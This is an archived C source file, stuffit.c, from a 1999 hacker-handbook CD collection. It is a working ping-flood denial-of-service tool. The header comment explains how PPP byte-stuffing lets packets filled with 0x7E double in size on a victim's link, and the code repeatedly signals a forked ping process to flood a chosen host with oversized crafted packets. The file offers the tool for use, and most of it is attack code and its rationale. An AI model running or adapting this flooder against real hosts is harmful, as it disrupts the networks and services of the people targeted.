home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / files / c_scripts / stuffit.c < prev    next >
Encoding:
C/C++ Source or Header  |  1999-04-11  |  2.8 KB  |  77 lines
  1.  
  2. /*   
  3.    Stuffit.c
  4.    Noc-Wage -*- wage@idirect.ca
  5.            12/12/98
  6.  
  7.    This is just a modified version of:
  8.    pingflood.c by (AntireZ) Salvatore Sanfilippo <md5330@mclink.it>
  9.    enhanced by David Welton <davidw@cks.com>
  10.  
  11.    I simply made it so that it will generate the ping packets so
  12.    that they contain 0x7e which is an illegal character in PPP 
  13.    frames.  I also made it so you could set the size of the packet
  14.    hopefully this came with my keen veracity article
  15.    but incase it didn't here is part of it  so you understand why 
  16.    this even exsists:
  17.  
  18.      Explanation of Byte Stuffing
  19.  
  20.    As explained in the PPP frame explanation there is a risk that 
  21.    certain illegal values will end up in the information of a PPP 
  22.    frame.  To solve this problem byte-stuffing is used.  In the 
  23.    case of PPP frames the illegal value is changed to two bytes.
  24.    One is the value 01111101 (0x7D) the other is the illegal 
  25.    character XOR'd with 0x20.  In the case of 0x7E it will become
  26.    0x7D, 0x5E.  This also makes any 0x7D which was not added by
  27.    the PPP daemon to be encoded in the same manner to avoid 
  28.    corrupting valid data.  What this means is that a single byte
  29.    (for example 0x7E) will be converted into a pair of bytes
  30.    (0x7D, 0x5E) but only when encapsulated in PPP frames.
  31.    If 4-bytes in the datagram are 0x7E then each of those 4-bytes
  32.    will be converted into the 0x7D, 0x5E pair.  This results in
  33.    the 4-bytes being turned into 8-bytes when encapsulated in a 
  34.    PPP frame.  This added data is known as "overhead".
  35.  
  36.    The implications of this is that maliciously engineered packets
  37.    could be made to exploit the byte-stuffing method and can 
  38.    cause a worst case overhead of 100%.  This means that a packet 
  39.    could literally double in size when encapsulated in a PPP 
  40.    frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes.  
  41.    This means that an attacker requires half the bandwidth to
  42.    cause the same amount of disruption.  This also means that if
  43.    an attacker is on a PPP connection and is attempting this 
  44.    attack he will also find that he requires as much bandwidth to 
  45.    transmit the packets as the victim requires to recieve them.
  46.  
  47.    If you don't understand why this is a bad thing then don't 
  48.    bother using this program because you'll most likely use
  49.    it ineffectively.
  50. */
  51.  
  52. #include <signal.h>
  53.  
  54. #define PING "/bin/ping"
  55.  
  56. main( int argc, char *argv[] )
  57. {
  58.   int pid_ping;
  59.   if (argc < 3) {
  60.     printf("use: %s <hostname> <size> <illegal char>  (I'd suggest 7e or 7d)\n", argv[0]);
  61.     exit(0);
  62.   }
  63.  
  64.   if(!(pid_ping = fork()))
  65.     execl(PING, "ping", argv[1], "-s", argv[2], "-p", argv[3]);
  66.  
  67.   if ( pid_ping <=0 ) {
  68.     printf("pid <= 0\n");
  69.     exit(1);
  70.   }
  71.  
  72.   sleep (1);  /* give it a second to start going  */
  73.   while (1)
  74.     if ( kill(pid_ping, SIGALRM) )
  75.       exit(1);
  76. }
  77.